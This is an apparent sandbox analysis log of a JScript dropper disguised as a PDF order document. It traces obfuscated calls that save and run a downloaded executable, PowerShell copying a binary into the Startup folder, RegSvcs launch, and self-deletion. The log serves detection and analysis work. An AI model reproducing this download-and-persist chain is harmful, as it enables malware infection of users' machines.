Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell" Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe

Jump to behavior

Source: classification engine

Classification label: mal100.spre.troj.adwa.spyw.evad.winJS@14/10@1/2

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4876:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-CMFPLR

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: RuDl.pdb source: VNZVNCXKKJSF.exe, 0000000A.00000002.414602354.0000000002920000.00000004.08000000.00040000.00000000.sdmp, VNZVNCXKKJSF.exe, 0000000A.00000002.414888406.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Systedbddfm.exe, 00000011.00000002.707496328.0000000002C50000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\VNZVNCXKKJSF.pdbBSJB source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr
Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\VNZVNCXKKJSF.pdb source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: CreateObject%22");ITextStream.WriteLine(" entry:1716 f:_0x56566c a0:237");ITextStream.WriteLine(" exit:1716 f:_0x56566c r:%22BQ9o%22");ITextStream.WriteLine(" entry:1712 f:_0x155c25 a0:127 a1:%22BQ9o%22");ITextStream.WriteLine(" exit:1712 f:_0x155c25 r:%22ADODB.Stream%22");IHost.Name();ITextStream.WriteLine(" entry:1703 o:Windows%20Script%20Host f:CreateObject a0:%22ADODB.Stream%22");IHost.CreateObject("ADODB.Stream");IHost.Name();_Stream._00000000();ITextStream.WriteLine(" exit:1703 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:1813 f:_0x445216 a0:205 a1:%22%5Epwq%22");ITextStream.WriteLine(" exit:1813 f:_0x445216 r:%22Open%22");_Stream._00000000();ITextStream.WriteLine(" entry:1809 o: f:Open");_Stream.Open();_Stream._00000000();ITextStream.WriteLine(" exit:1809 o: f:Open r:undefined");ITextStream.WriteLine(" entry:1823 f:_0x115fc7 a0:136");ITextStream.WriteLine(" exit:1823 f:_0x115fc7 r:%22Type%22");_Stream.Type("1");ITextStream.WriteLine(" entry:1832 f:_0x445216 a0:241 a1:%22h2t%24%22");ITextStream.WriteLine(" exit:1832 f:_0x445216 r:%22Write%22");IServerXMLHTTPRequest2.responseBody();_Stream._00000000();ITextStream.WriteLine(" entry:1828 o: f:Write a0:");_Stream.Write("Unsupported parameter type 00002011");_Stream._00000000();ITextStream.WriteLine(" exit:1828 o: f:Write r:undefined");ITextStream.WriteLine(" entry:1846 f:_0x115fc7 a0:144");ITextStream.WriteLine(" exit:1846 f:_0x115fc7 r:%22Position%22");_Stream.Position("0");ITextStream.WriteLine(" entry:1855 f:_0x115fc7 a0:124");ITextStream.WriteLine(" exit:1855 f:_0x115fc7 r:%22SaveToFile%22");_Stream._00000000();ITextStream.WriteLine(" entry:1851 o: f:SaveToFile a0:%22C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5CVNZVNCXKKJSF.exe%22 a1:2");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe", "2");_Stream._00000000();ITextStream.WriteLine(" exit:1851 o: f:SaveToFile r:undefined");ITextStream.WriteLine(" entry:1866 f:_0x445216 a0:232 a1:%22zn0Y%22");ITextStream.WriteLine(" exit:1866 f:_0x445216 r:%22Close%22");_Stream._00000000();ITextStream.WriteLine(" entry:1862 o: f:Close");_Stream.Close();_Stream._00000000();ITextStream.WriteLine(" exit:1862 o: f:Close r:undefined");ITextStream.WriteLine(" entry:1878 f:_0x115fc7 a0:110");ITextStream.WriteLine(" exit:1878 f:_0x115fc7 r:%22Shell.Application%22");ITextStream.WriteLine(" entry:1883 f:_0x56566c a0:269");ITextStream.WriteLine(" exit:1883 f:_0x56566c r:%22ShellExecute%22");ITextStream.WriteLine(" entry:1891 f:_0x155c25 a0:125 a1:%22vUkl%22");ITextStream.WriteLine(" exit:1891 f:_0x155c25 r:%22open%22");IShellDispatch6._00000000();ITextStream.WriteLine(" entry:1872 o: f:ShellExecute a0:%22C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5CVNZVNCXKKJSF.exe%22 a1:%22%22 a2:%22%22 a3:%22open%22 a4:%221%22");IShellDispatch6.ShellExecute("C:\Users\user\AppData\Local\Temp\VN", "", "", "open", "1")

Potential obfuscated javascript found

Source: Order Specifications PDF.js

Initial file: High amount of function use 12

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02CF56AF push esp; iretd	11_2_02CF56B2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02CF56AB push esp; iretd	11_2_02CF56AE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02CF56A9 push esp; iretd	11_2_02CF56AA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02CF56BF push ebp; iretd	11_2_02CF56C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02CF56BB push ebp; iretd	11_2_02CF56BE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02CF56B7 push ebp; iretd	11_2_02CF56BA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02CF56B3 push esp; iretd	11_2_02CF56B6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02CF04C3 push eax; ret	11_2_02CF04C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02CFBACF push eax; retf	11_2_02CFBAD9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02CF0E58 pushad ; retf	11_2_02CF0E59
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02CF0FC3 push eax; mov dword ptr [esp], edx	11_2_02CF0FCC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02D1B250 push FFFFFF8Bh; iretd	11_2_02D1B25D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02D1B262 pushfd ; iretd	11_2_02D1B263
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02D140A0 push 00000005h; ret	11_2_02D140B5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02D13DAF push 00000005h; ret	11_2_02D13DC5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_02DB5367 push FFFFFF8Bh; iretd	11_2_02DB5374
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_02EFF8CD push FFFFFF9Fh; retn 004Dh	13_2_02EFF8D6

Source: initial sample	Static PE information: section name: .text entropy: 7.96732682517633
Source: initial sample	Static PE information: section name: .text entropy: 7.96732682517633
Source: initial sample	Static PE information: section name: .text entropy: 7.96732682517633

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exe	Jump to dropped file

Boot Survival

Drops PE files to the startup folder

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\System32\wscript.exe

File deleted: c:\users\user\desktop\order specifications pdf.js

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
